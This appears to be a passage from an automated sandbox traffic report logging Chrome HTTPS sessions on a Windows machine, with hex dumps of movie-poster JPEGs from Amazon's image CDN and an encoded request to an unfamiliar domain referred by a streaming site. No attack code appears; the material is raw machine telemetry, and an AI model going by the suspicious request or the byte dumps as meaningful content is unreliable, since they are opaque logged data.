                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ed 1c 8d 5d 3e bb 87 0d 65 33 3d ba 16 b9 fb ad 56 6d f1 9a cd 5c fd 4c 92 2c 96 88 78 66 9e f6 5c 4a 0b 05 78 65 59 03 00 c0 9a 98 fc b1 55 e4 fb 76 d2 35 21 08 ca c5 3c 17 9d cf 88 e4 6a f2 3d 53 ba d7 0c 2c 6d 57 55 cf dd 6a b3 f0 35 c4 2f 36 2d 9d 84 5f 71 6a 47 ca 13 57 2d 99 9a b8 4f 12 dc 4d 87 cd 4e df 3c 75 74 07 a7 7d 4a fa 5c 4a 62 93 5c 68 dc ee 7c 07 23 5c 41 09 b9 90 57 0f 66 36 b1 96 ba 1f 31 ab 23 ec 35 c7 24 c4 71 a5 40 33 2a d3 7d b6 a9 cf ca d5 69 76 60 9d 24 a0 c0 80 44 e7 fe 84 ab a7 0b 6f 23 37 73 b8 f6 cd 98 23 27 94 d1 17 4c 03 d2 8d 71 1d 46 ed aa d2 5d 76 f1 9a ba 1f 2d 59 1f 6b 0a e3 87 ac 55 6f f7 41 a3 d5 33 53 1c c8 d4 aa 4b 00 23 52 b1 a8 37 07 fe 85 ab a7 55 b6 90 ba b0 2f ad ed a7 59 60 8d d3 94 b7 58 18 53 44 d5 f6 4d d4
                                                                                                                                                                                          Data Ascii: ]>e3=Vm\L,xf\JxeYUv5!<j=S,mWUj5/6-_qjGW-OMN<ut}J\Jb\h|#\AWf61#5$q@3*}iv`$Do#7s#'LqF]v-YkUoA3SK#R7U/Y`XSDM
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: eb a5 4c 43 8d 29 9a 13 b4 38 f5 96 99 8a 06 4d 80 44 98 c7 b3 74 a7 e4 11 19 4a c7 ca 4a 40 e7 ff 00 59 c6 6e d1 79 37 74 b6 e0 3e d6 bf 3a a3 61 10 65 56 67 d4 57 28 ba b3 60 88 8e c3 6a f6 8a 7b d8 b9 f4 b9 01 7b 12 35 98 3f ee 6c e8 0c c5 3d db a5 1f 32 c0 36 34 57 01 72 30 fc b6 f0 ef e3 5f 79 b6 fb 98 56 5d a0 f0 9b f3 ed 37 5d e2 7e 0e 98 9c 4a 6e 72 98 9f c6 ef c8 51 60 c1 c5 c9 c6 3e 4d de 29 47 3a 58 cf 0e f0 bf b1 b2 ad 2f ad 99 6d 9c ec 66 eb 8a 7e e6 e9 8f f3 a4 23 45 b7 8b f0 ac a3 e3 8e 15 ad 75 6f fd 0f 1b 7e 56 25 61 7f 8f 64 32 ec e3 f8 63 7d 62 53 72 d6 15 42 89 65 4b 61 74 6b 51 6b c7 28 02 a9 1b 96 6b 9b 6b a6 2f bc f4 a4 fe 54 9a 23 66 62 36 ea 02 63 9f b2 3f 6b 9e 6f 43 66 fc 47 b3 27 ea 98 78 88 3e 8c 96 5d 6d 79 15 d7 70 75 0c 37
                                                                                                                                                                                          Data Ascii: LC)8MDtJJ@Yny7t>:aeVgW(`j{{5?l=264Wr0_yV]7]~JnrQ`>M)G:X/mf~#Euo~V%ad2c}bSrBeKatkQk(kk/T#fb6c?koCfG'x>]mypu7
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: fb d4 df c2 6b 09 ac a7 33 6d c0 b1 a9 a5 9b 4b e8 4f 65 6f 53 5a 6c 6a 72 2f a1 73 c9 a4 76 99 a9 ef 53 95 7d 2b 9a b8 86 08 d4 ce 66 2b e9 4e 3c 43 0f 3c 36 94 4c 4b a2 de cb 1d d7 dd 14 64 d0 c7 4e 14 dc af 57 a3 fb 2b 3f 68 ba c1 77 45 08 e0 56 e9 f8 3d 60 d9 a2 8f b2 27 b2 b5 ec ad ac 50 08 2b d5 ea f4 10 41 60 82 bf 81 30 28 c7 ba 33 7d ea 19 31 57 f0 45 14 6b 94 62 68 61 29 ac 78 01 2e 26 7e d1 11 c6 88 a1 a4 45 1d 65 28 c0 d2 30 28 20 84 30 3c 00 e0 85 3c 60 78 31 54 7f 64 7f ff c4 00 28 10 00 02 01 03 03 03 05 01 01 01 01 00 00 00 00 00 00 01 11 21 31 41 10 51 61 71 81 91 20 a1 b1 c1 f0 d1 e1 f1 30 ff da 00 08 01 01 00 01 3f 21 7b 82 6e 46 9c 9c a6 cb 39 4e 72 5c 9c a7 31 06 47 62 74 b9 3d 17 36 b2 46 28 a6 45 a4 46 41 a0 dc 37 05 c0 c0 d0 7a 0d
                                                                                                                                                                                          Data Ascii: k3mKOeoSZljr/svS}+f+N<C<6LKdNW+?hwEV=`'P+A`0(3}1WEkbha)x.&~Ee(0( 0<<`x1Td(!1AQaq 0?!{nF9Nr\1Gbt=6F(EFA7z
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 8d 6f e5 7d 2d 58 09 3a 36 d2 29 23 45 6a dc c1 68 44 ee 94 43 80 77 3e c2 61 ee b4 ad fc 28 30 a2 bb d9 f9 b8 91 c1 d4 ab 76 a9 c6 44 42 c5 64 b6 dd 69 77 53 1d be 18 eb 38 dc 89 9c 4f 72 94 7c 31 36 b0 fc 99 35 14 2d 52 8d 27 40 df 07 9e 81 48 29 35 e2 e4 eb 9a 85 b6 96 14 31 10 48 4f 94 21 ab 12 50 9e d9 e0 44 4f 25 28 f3 d0 69 97 52 2c c5 b6 d0 a4 db 73 b5 87 5a 1c 26 af 87 42 01 b1 ec a5 2d 4f 92 09 92 d3 5c d6 9e 88 7a 32 8d 92 20 a1 34 c8 db 69 d1 7b 18 08 32 98 dc ad 2b 81 59 4f c2 16 a7 c3 4d 3d 9a d0 8a cd 83 c3 fe ce 92 48 d0 8e 59 22 68 27 aa 00 8e ac 5b 8a d7 04 23 68 55 ad e0 a9 c8 59 b3 22 94 d9 5b a7 64 33 70 8c 70 b6 30 bf d1 7f a4 10 f7 a7 e6 23 74 2d 70 62 fd 21 a1 05 09 41 32 54 52 3b 91 e9 59 7d dd 11 26 be bb 09 3f 2a 3e dd 8a b4 fa
                                                                                                                                                                                          Data Ascii: o}-X:6)#EjhDCw>a(0vDBdiwS8Or|165-R'@H)51HO!PDO%(iR,sZ&B-O\z2 4i{2+YOM=HY"h'[#hUY"[d3pp0#t-pb!A2TR;Y}&?*>
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: fb 87 ab b7 f4 25 3f 16 44 0c 85 77 20 dc a3 a4 8f 89 e8 f1 11 20 6c 72 77 48 7a 3f 4c df 44 ac 3d 0d ca 68 8b 0c 31 0e 12 c7 a1 5d e7 42 ca b9 42 d1 ff 00 7c 31 2a 7f 12 10 6d eb fa 23 1c e9 3e c1 f7 68 b2 cc 68 20 1e 49 fa 09 e8 95 9b eb ed 02 39 31 a8 13 69 99 d3 e5 d2 d6 8a f4 58 f0 27 70 51 cd ee 53 d3 65 f2 48 74 11 ac e9 dd c4 b2 31 3e e4 cd ee f4 7a 4c 9d 10 52 e4 6a b4 a0 f6 95 a3 e7 4b bd 4b 14 3e a1 2a 5e 83 ab a8 7d 16 a7 01 e5 8b 67 e0 f7 df cb 57 84 74 17 d6 8e 7d 51 68 74 d3 2c 2c 84 50 c2 75 71 5c 83 3a 63 42 cb 20 63 42 05 05 e4 ef 08 a4 b4 bb d5 69 72 d1 3c fd 9a 1d 27 47 8e 2f 93 22 a8 d7 da 3e 76 8c 8a b8 f7 32 e0 84 ee 7c c2 e4 5c 3d ca d0 34 8b 7c 5a 0d 96 12 b2 80 44 0d e8 75 24 59 e8 09 e1 b0 9d 45 ee 22 06 89 a0 12 c7 a3 b8 4e 18
                                                                                                                                                                                          Data Ascii: %?Dw lrwHz?LD=h1]BB|1*m#>hh I91iX'pQSeHt1>zLRjKK>*^}gWt}Qht,,Puq\:cB cBir<'G/">v2|\=4|ZDu$YE"N


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          105192.168.2.1649841151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC445OUTGET /images/M/MV5BNzBjNjhhZDAtMmNjZS00YzM1LWE5ZDctNWJkNWQwOWFhMTkzXkEyXkFqcGdeQXVyNDUxNjc5NjY@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 30520
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e14067f5-6c7e-49b0-a2fb-247892b030d5
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 23 Feb 2016 10:05:36 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 14:24:06 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2068830
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200023-IAD, cache-nyc-kteb1890026-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 04 05 06 07 01 03 08 09 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 00 01 02 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e3 3c ec 7d 89 db 9c 8e ac 1a 27 b1
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6<}'
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a6 cd 67 15 35 33 af 60 4d a1 5e 92 18 74 ed 5f d6 4f 9b 14 3c f9 d3 df bc e1 bd 8f cf 20 c5 b9 54 00 12 19 c6 52 b3 5c d8 7a ef 23 af e7 37 c4 7a ab 6d 76 dc c3 83 97 47 0f b6 cf 5f d8 31 e6 db c8 b1 3f 39 24 71 19 c3 70 2c d6 da e6 a9 9b 4d 7b bb 6b 85 6c dc 68 df 16 77 ae 61 d6 45 77 b1 d6 f4 94 41 04 da 3c ed 75 8d d2 80 5e 88 e3 05 47 39 70 8e 4e df 5d 6a 9d 6e ea d5 7b ec f6 0b 16 ab 08 bd b3 1f 93 57 30 4b e2 a0 d4 e2 19 b3 8c db c1 b0 a4 31 d5 99 7d 7b e2 c8 b2 80 68 74 04 53 a5 a2 18 19 f5 97 57 b7 54 81 cd b0 16 d7 b6 c6 6b 60 1f 15 e9 eb c1 b0 f2 c6 0d 86 58 19 c2 45 a0 6f ce 72 bf b5 ae fa e7 a5 37 75 7a 31 0d 7d 72 bf 35 4c 05 5a 2a ec 95 b9 c9 ca 6d 05 71 a9 d9 7a 4d bb 9d 3c 11 71 05 35 0c 4f 33 ab b3 9d 3a 72 89 78 f3 e6 32 36 38 1b 17 66
                                                                                                                                                                                          Data Ascii: g53`M^t_O< TR\z#7zmvG_1?9$qp,M{klhwaEwA<u^G9pN]jn{W0K1}{htSWTk`XEor7uz1}r5LZ*mqzM<q5O3:rx268f
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 67 9b 06 66 46 94 f7 64 18 a9 4d b3 0d d2 cf 37 db 0b 9a cd b1 b3 07 9c 46 c5 eb c3 38 fe c9 1b 24 a3 18 ae 67 c9 28 59 61 96 e0 e4 83 b4 36 55 a3 42 a5 7a e3 28 d8 12 45 84 a3 54 e3 0e 13 1c c5 eb f9 2b b1 d2 85 1a 65 86 78 88 97 e1 28 31 a7 41 9e 26 e4 fb b2 51 86 eb 9b e5 9e 14 b6 4d 94 a2 a2 62 13 b0 37 cc b6 25 08 96 be 29 a1 69 80 f2 3d 4c ee fb d3 a5 c8 ba e7 09 b0 2a 8b 61 dd ac 0d bc e7 42 00 71 a2 d4 00 88 97 50 0e 3c eb 01 31 8a 02 44 00 33 8d e0 3b 6b 30 09 6c 38 0e 8a 00 4e 73 80 ed b3 20 42 63 60 0a 59 c8 09 c8 00 c7 b8 ec d6 00 08 00 09 0d 00 3a ff c4 00 32 10 00 02 01 03 02 04 05 04 02 02 02 03 01 00 00 00 01 02 03 00 04 11 05 12 10 13 21 31 06 14 20 22 32 23 30 33 41 15 42 51 61 24 40 34 43 52 53 ff da 00 08 01 01 00 01 08 02 e0 a9 9a 09
                                                                                                                                                                                          Data Ascii: gfFdM7F8$g(Ya6UBz(ET+ex(1A&QMb7%)i=L*aBqP<1D3;k0l8Ns Bc`Y:2!1 "2#03ABQa$@4CRS
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: e6 36 aa 3e 8d 6e 0d 93 50 28 18 63 a4 a1 58 7a ea 16 72 5c 94 02 f9 d2 25 31 41 a3 ae db 68 c5 6a c7 99 73 b0 58 7e 08 eb 4f 5e 74 c5 e8 ff 00 ae 47 97 56 92 e3 50 b9 de dd 74 26 dd 06 6b 58 6c 4f 25 59 27 cc d5 81 fa 10 d6 ad a5 4d 24 ec e3 c3 93 f4 96 26 d4 74 a3 70 dc c4 d1 61 78 84 db fc 43 77 bb 0b 1e 8a cc b7 36 f5 af a6 e4 8e b0 15 d8 55 dd b9 9a d9 a2 49 34 e3 67 cb 7b 88 f6 ed 5d 96 82 73 24 ad 3e af a6 1b c0 19 2e 6d bc be 55 b8 1e 11 21 76 00 5b 34 51 fb a4 1a f6 4e 04 da 97 3e 36 42 ff 00 26 ab 5b 7c fb d8 4f b3 dc 3f 9a e7 2e c4 63 24 b2 72 d6 0b c3 08 31 8c f3 ee 09 a3 ff 00 1e dd 56 a0 b8 95 11 42 41 a8 18 c6 5a f2 e9 e4 cb b9 cd c7 ca cb 51 e4 46 56 3b cf aa e5 eb 25 3b 5a ea 2d 6c b9 0d af 00 99 a9 c3 30 2c 9a 56 b3 94 fa da 9e bc c3 da
                                                                                                                                                                                          Data Ascii: 6>nP(cXzr\%1AhjsX~O^tGVPt&kXlO%Y'M$&tpaxCw6UI4g{]s$>.mU!v[4QN>6B&[|O?.c$r1VBAZQFV;%;Z-l0,V
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 71 15 3d dc 86 8b 93 42 57 14 d1 23 77 92 c8 7f 59 f9 62 28 d3 d3 6f 66 97 d6 91 62 ea dd e0 7e 5b 62 83 b2 1c 89 2f 25 ec 74 a4 db 6f 1f 0c d6 ea dd 4e 37 f7 f2 e2 bc bd 46 9b 47 1b 8b 44 9f ab 3e 9d 81 ec ad 3a 5e e9 57 31 ef 1b 80 19 e9 53 af 2d 54 7a 24 6d aa 4d 47 ed 93 32 5c cf 0c a9 2e 06 98 18 0a 36 39 1b 93 ca 4b db 83 a8 7e 8d 34 5c b3 8e 3f ba 8a e1 a2 39 49 24 2e 49 61 df 22 c2 c7 cc fb de f0 f9 59 9c 56 95 7d 30 6e 5c 64 d3 de 46 9d 29 25 df f6 ae 86 24 7a 47 28 77 0b 7b 91 28 e8 b0 ae ed d5 78 3b 1f 44 cd b0 06 a5 bc 8e 41 87 c4 33 9c a0 b2 c1 f6 3c 37 1d 77 7f 22 54 fd 4f 31 6e db 49 92 ce 12 a5 85 d2 ee 43 c5 87 00 d8 34 0f ea ba c1 00 d8 d7 90 cc b8 95 14 28 e9 7f 3b 6f e5 8d 32 25 f7 37 da 3d 2a 46 de c4 f0 56 2b d4 47 a8 91 8d f2 27 30
                                                                                                                                                                                          Data Ascii: q=BW#wYb(ofb~[b/%toN7FGD>:^W1S-Tz$mMG2\.69K~4\?9I$.Ia"YV}0n\dF)%$zG(w{(x;DA3<7w"TO1nIC4(;o2%7=*FV+G'0
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: be f3 9a 43 fe 64 98 74 55 a8 a5 31 9a b9 50 70 e3 8a 42 65 7a 92 51 6f 84 48 2d f6 1d ef 2d c7 e9 49 cf 18 fa 28 cc f2 ef ed eb c5 45 01 7a 38 8c 74 3d 69 a5 0b dd 25 0d d3 89 9f 1e 83 28 14 0e 7b 7a 24 6d 91 c7 9c e7 a8 e1 a9 ea 6b 62 02 26 9d 68 6d d0 b4 92 cd bb a0 f4 3c a5 fe c0 52 dd 96 01 18 dd 25 c6 a7 fa 86 cf e5 2b 1a b8 fd 1a b7 5c e4 9a 6e d4 ab bc 81 c7 fc d1 a8 3e 3c 0d 47 9d c2 94 6e 20 52 dd 46 ce d0 33 58 98 be 18 e1 a0 5a 9b a9 5e ee 59 e6 cf 41 eb 51 9a 68 59 68 21 35 14 18 1e e3 6a b4 2d 94 54 da 84 71 74 49 a6 79 ba be 6a 19 b9 6a c2 bc cd 49 26 ec 54 7f 01 8a 73 81 50 7c a8 f0 90 e1 4d 13 50 9f 6f 1c 88 d9 a9 2e 71 d6 8f 5a b7 d4 4a 74 70 22 b9 19 5f 25 41 05 9c 29 12 8a 1e a5 52 7b 43 6f b7 dc c3 55 87 71 15 e7 e0 a3 a8 40 2a 5d 57
                                                                                                                                                                                          Data Ascii: CdtU1PpBezQoH--I(Ez8t=i%({z$mkb&hm<R%+\n><Gn RF3XZ^YAQhYh!5j-TqtIyjjI&TsP|MPo.qZJtp"_%A)R{CoUq@*]W
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: e2 e0 b2 91 50 9c af d8 f9 0a 08 48 40 5c 96 52 c3 f1 bd e0 e2 10 b4 81 70 d8 52 62 3a a8 54 c9 25 44 87 2c 7a 58 c6 7b 2c d5 70 f9 8a 2c 74 86 f2 5b 77 ee 45 17 ab 9c e0 4f 6b c8 41 3a 03 1f 57 53 e0 07 5c 0a ef e6 a4 01 d0 ab cf 67 62 87 01 e4 b5 08 a2 31 74 82 9d 81 62 44 6a 85 87 72 16 8b 40 b1 37 98 8a 57 9f 91 4a 85 98 2a c1 c4 c6 89 93 ec a4 5f 21 6e e7 88 f8 b6 e4 96 6f c4 d1 ff 00 74 d0 78 c5 45 cb 3b 4e ee 6e 39 89 2f dc 43 14 f1 c5 13 76 d7 ae 0d 58 8f c9 8d 3c 1b 61 95 2d 9d a0 74 e9 1c fd a9 16 4a 4e 47 70 18 f7 e1 f8 02 62 c0 d7 69 84 d1 b2 51 6f 02 b6 c0 24 da a2 34 b3 ce 24 86 34 97 7b 67 75 95 c0 9c f0 c7 3e 17 88 5f 3b b4 65 49 53 1d 9b ca 7c 47 02 c4 ba ad 24 85 4d 4d 15 bf f9 b9 c1 6d 84 57 af 17 85 5e 5d 0f f9 7f 2d 0d 5a 59 c6 88 24
                                                                                                                                                                                          Data Ascii: PH@\RpRb:T%D,zX{,p,t[wEOkA:WS\gb1tbDjr@7WJ*_!notxE;Nn9/CvX<a-tJNGpbiQo$4$4{gu>_;eIS|G$MMmW^]-ZY$
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 2d b2 71 40 d3 6e 78 e7 64 31 90 55 fa 44 14 f0 3b 43 16 9a 9a f7 52 03 65 f2 8e a0 85 7c 75 eb ae 06 a4 d3 58 32 68 2e 24 0a bd 0e ef 18 9e ea 2d 85 54 8d ef 6d c7 cf 4a 2b 17 36 2b 37 39 80 97 5a 9c 95 6c 69 83 5d d7 0f 96 d4 eb 1a 41 c6 a4 d1 82 d1 24 d8 91 5e 28 08 8c 6f 59 04 c4 94 71 d3 1f 2c d9 14 1e 3e a6 63 e4 3d d7 82 93 d1 9f 1a 4c d5 8b a8 6d d7 23 be 47 41 f3 a4 28 07 2f 3b 63 85 2a b4 ac a7 34 9c c9 e4 e9 f2 ab 4e 03 c3 64 6a 27 77 c5 db 9f 1d db b8 cf 3e 4e ac 6e 14 9e 25 ba bf 15 7a 70 3a 8e 6c a0 55 c0 f7 f2 f2 48 29 30 4f 93 59 99 2b 4b 1e bc e8 02 75 34 eb aa 4d 89 e7 d8 0e 48 1a 96 68 8c 15 19 36 cb 64 03 4c 9c cb 4a 94 07 19 1f 91 db 4b 25 28 5b 46 71 e0 14 ac fa 51 97 ec c9 71 1e 35 fc c5 bf 41 9f bb 96 22 64 9e 34 10 01 a8 45 48 25
                                                                                                                                                                                          Data Ascii: -q@nxd1UD;CRe|uX2h.$-TmJ+6+79Zli]A$^(oYq,>c=Lm#GA(/;c*4Ndj'w>Nn%zp:lUH)0OY+Ku4MHh6dLJK%([FqQq5A"d4EH%
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: d7 d3 d0 f0 43 45 d4 fc ae 6f c7 e7 5c a5 64 2a 8a dc 37 3a f3 0e 38 02 a0 1e 75 e6 1a 35 04 70 05 86 bc c3 47 20 1d 79 87 20 eb cc 34 6d f1 a1 6e 4e bc bc 7c 15 c6 5a 4d 49 fa 14 d2 f5 55 03 57 82 d3 82 74 74 07 c6 8f bf fa f7 1e ff 00 eb 43 f5 af fa d4 bf c0 7b 73 ed ff c4 00 3f 10 00 01 02 03 03 09 06 04 05 02 06 03 00 00 00 00 01 00 11 02 21 31 12 41 51 03 10 20 22 30 61 71 81 91 32 42 52 a1 b1 d1 13 c1 e1 f0 23 40 62 92 f1 50 72 04 33 53 82 a2 c2 14 43 b2 ff da 00 08 01 01 00 09 3f 02 d1 8e 1c 98 34 b5 53 c9 44 22 11 89 11 a5 96 85 a2 a1 9c d1 79 03 2d fa 30 93 c0 3e 68 c4 2f 47 bf 72 8c 13 3b 57 08 1b 15 10 89 af 1f 94 a5 b8 56 e6 e0 9d 87 67 e8 b2 70 42 f6 8c 71 59 a0 80 fc fc d6 4e 10 2c 83 4a be 2b 25 93 b0 c1 e9 de dc e8 00 c6 82 54 cc 22 6d 6e
                                                                                                                                                                                          Data Ascii: CEo\d*7:8u5pG y 4mnN|ZMIUWttC{s?!1AQ "0aq2BR#@bPr3SC?4SD"y-0>h/Gr;WVgpBqYN,J+%T"mn
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ee 95 cb 29 64 c4 22 b2 6d ef 72 3f 4d af a2 8c 38 8a 2e fc a1 07 1e 52 0b 2c 20 ca 8c a9 b6 6d b5 bc 35 af 65 95 0e 72 a6 7f 12 c7 fb b8 7a a2 23 3f 12 29 5b c6 54 bc 3e c3 b5 1d fb 5e e8 4f 1c 71 75 46 c8 c2 b1 28 2c ef 2a 65 19 a0 22 5d 88 bc b3 d1 45 a9 0c 0e ed 55 dd a6 fb db a2 8a 27 04 50 3d 6f 51 99 e5 ac 48 49 18 ff 00 0c dc 03 9b 94 71 59 85 d8 80 a2 2c 1e 6d 80 74 49 90 ac ab 34 f6 a7 6b 0e 59 c4 d4 0d c4 b2 85 f9 a6 95 36 a1 c1 b9 06 df 7a 2a e5 21 ea ae cd 71 19 e7 49 62 b2 61 b5 a5 3e fd 54 1d 87 7a 8b 4f e2 59 20 3e 21 df 2f e1 64 84 56 63 77 2f 55 91 d5 ca b5 49 e3 ea b2 23 f1 0e fa 56 c8 59 20 0e 53 8c b1 6e 2a 11 0c 85 37 67 9b 9a 5e 84 cd f5 3b 2b d5 74 a4 31 cd 47 cd 0a 92 88 70 c5 06 28 39 28 6b 5a f3 51 7f ed 17 86 c2 5b ad 23 74 1d
                                                                                                                                                                                          Data Ascii: )d"mr?M8.R, m5erz#?)[T>^OquF(,*e"]EU'P=oQHIqY,mtI4kY6z*!qIba>TzOY >!/dVcw/UI#VY Sn*7g^;+t1Gp(9(kZQ[#t


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          106192.168.2.1649776172.67.183.1594436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:13 UTC722OUTGET /ZFlsYWdLZg8SWj4OFFIFVQs+OTI+ADVQVjILXQUTMTU+MT8jDEoVDgBkXVFeVmtbWUEUMAhcVkIqGAATESpRUEENNwoOWkIvUVBJV21CUlFKbUoUWlV/GBEGA2RdRxcQLQBcVlNqWFNRVm9bVlRTbQ HTTP/1.1
                                                                                                                                                                                          Host: bineukdwithme.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC776INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:13 GMT
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EpS%2FVO5DDWoOJhbtjciRh0O%2F8eOJKS84rBRgLIBBC8jwwKQ9KcfjmW%2F8dMgOGcYDOY%2BPilxnTaKrfGcTbkRrqge8RP2w%2BAphXr1nFWZFw2%2BIQcUIXmONvgJ40tKgbFsV%2BU8fkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f262568beef8c3b-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1885&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1300&delivery_rate=1503604&cwnd=231&unsent_bytes=0&cid=3ef3b76f35eee9f0&ts=12973&x=0"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          107192.168.2.1649842151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:13 UTC676OUTGET /images/M/MV5BZGEyNDljMjQtZGI0Ni00ZWM0LWI5NjktMjNiMmI1YmZiOTIxXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 29274
                                                                                                                                                                                          Content-Type: image/jpeg
